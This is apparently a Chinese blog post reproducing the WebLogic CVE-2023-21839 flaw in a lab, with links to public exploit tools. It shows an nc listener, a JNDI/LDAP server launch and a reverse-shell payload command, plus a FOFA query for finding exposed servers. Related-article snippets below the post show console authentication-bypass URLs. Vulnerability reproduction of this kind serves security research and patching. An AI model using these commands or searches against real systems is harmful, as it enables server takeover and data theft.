weblogic_12.2.1_未授权访问漏洞_CVE-2023-21839

最新推荐文章于 2024-05-16 23:05:09 发布
最新推荐文章于 2024-05-16 23:05:09 发布
阅读量192 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/132996602
版权

Weblogic_12.2.1_未授权访问漏洞_CVE-2023-21839

说明内容
漏洞编号CVE-2023-21839
漏洞名称Weblogic_12.2.1_未授权访问漏洞
漏洞评级高危
影响范围12.2.1.2.0
12.2.1.1.0
12.2.1.3.0
12.2.1.0.0
12.2.1.4.0
14.1.1.0.0
12.1.2.0.0
12.1.3.0.0
10.3.6.0
漏洞描述由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server
修复方案升级新版本

漏洞描述

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

漏洞等级

高危

影响版本

  • 12.2.1.2.0
  • 12.2.1.1.0
  • 12.2.1.3.0
  • 12.2.1.0.0
  • 12.2.1.4.0
  • 14.1.1.0.0
  • 12.1.2.0.0
  • 12.1.3.0.0
  • 10.3.6.0

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
weblogic12.2.1

漏洞验证

漏洞检测工具下载地址:https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839

  1. 拉取镜像,启动环境进入console目录,需要等一会

    127.0.0.1:7001/console

    image-20230918200742733

  2. 使用漏洞检测工具进行验证

    java -jar Weblogic-CVE-2023-21839.jar 10.9.75.71:7001 ldap://cwc.ecgaej.dnslog.cn

image-20230918201416048

深度利用

ladp服务启动工具下载地址:https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip

GetShell

  1. 首先在kali设置监听,用于接收反弹shell

    nc -lvvp 3333

  2. 使用工具启动ladp服务

    java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.9.75.71

    image-20230918203557505

  3. 使用检测工具来进行攻击测试

    java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口

    image-20230918204435277

    java -jar Weblogic-CVE-2023-21839.jar 10.9.75.71:7001 ldap://10.9.75.71:1389/Basic/ReverseShell/10.9.75.71/3333

    image-20230918204506589

EXP编写

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

漏洞挖掘

网络测绘

FOFA

app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"

修复建议

cwangc000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Weblogic授权访问以及LADP远程代码执行(CVE-2021-2109)
hackzkaq的博客
05-14 1486
1.影响版本: WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 实验环境: 攻击机:kalilinux 10.1.1.10 靶机: 10.1.1.109 2.weblogic授权访问: 对目标地址的7001端口直接访问 构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%25
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
02-28
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1583
weblogic漏洞复现
Weblogic 管理控制台授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
weixin_45653478的博客
05-14 900
Weblogic Pre-Auth Remote Command Execution 漏洞(CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞。CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
24、25-反序列化漏洞(JBoss、apache log4、apache Shiro、JWT)Weblogic授权访问、代码执行、任意上传
最新发布
XLbb的博客
05-16 1619
serialize() 和 unserialize() 在 PHP内部实现上是没有漏洞的,之所以会产生反序列化漏洞是因为应用程序在处理对象、魔术函数以及序列化相关问题的时候导致的。 当传给 unserialize() 的参数可控时,那么用户就可以注入精心构造的 payload。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。 CVE-2021-2109Weblogic Server远程代码执行。apache log4j (Java日志记录库)
weblogic授权访问漏洞复现(CVE-2020-14882)
Armandhe的博客
06-07 4905
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
weblogic授权访问命令执行复现(cve-2020-14882)
来到了学渣的博客
11-01 4632
最近的weblogic漏洞很火,直接上手复现一波。也踩了很多坑,比如用docker搭建环境的时候,用不回显payload的话,如何执行命令(所以用有回显的payload是最舒服的最直观的) 漏洞版本主要影响到 Oracle WebLogic Server 版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。 版本12.2.1.3 先执行下现有的payload,可以直接授权面板 ip/console/images/%252E%252E%252Fconsole.p
weblogic_poc.cve-2018-2628.rar_cve-2018-2628_weblogic
09-20
验证是否存在cve-2018-2628漏洞
weblogic_cve-2019-2888:weblogic_cve-2019-2888
03-09
1)开启XXER工具python xxer.py -H 192.168... java -jar weblogic_xxe.jar xx.xml 3)使用java-deserialization-exploit工具中的weblogic.py发送数据给weblogic服务器python weblogic.py 192.168.17.222 7001 weblogic
vulhub中Weblogic 管理控制台授权远程命令执行漏洞复现(CVE-2020-14882,CVE-2020-14883)
yougexiaojiuguan的博客
03-10 632
漏洞复现过程的记录
CVE-2020-14882&14883 Weblogic 管理控制台授权远程命令执行漏洞复现
ierciyuan的博客
07-30 986
CVE-2020-14882&14883Weblogic管理控制台授权远程命令执行漏洞复现。提供相关软件包(网盘)
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3308
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4206
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3633
该篇记录了web漏洞-授权访问漏洞的相关知识
漏洞复现】Weblogic授权命令执行漏洞( CVE-2020-14882)
weixin_43486390的博客
12-17 1982
CVE-2020-14882
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1256
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行文件。另外,在引用中提到,可以使用docker-compose启动CVE-2023-21839漏洞环境。具体命令为sudo docker-compose up -d。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2023-21839:Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2023-21839EXP可执行文件](https://download.csdn.net/download/qq_51577576/87559811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值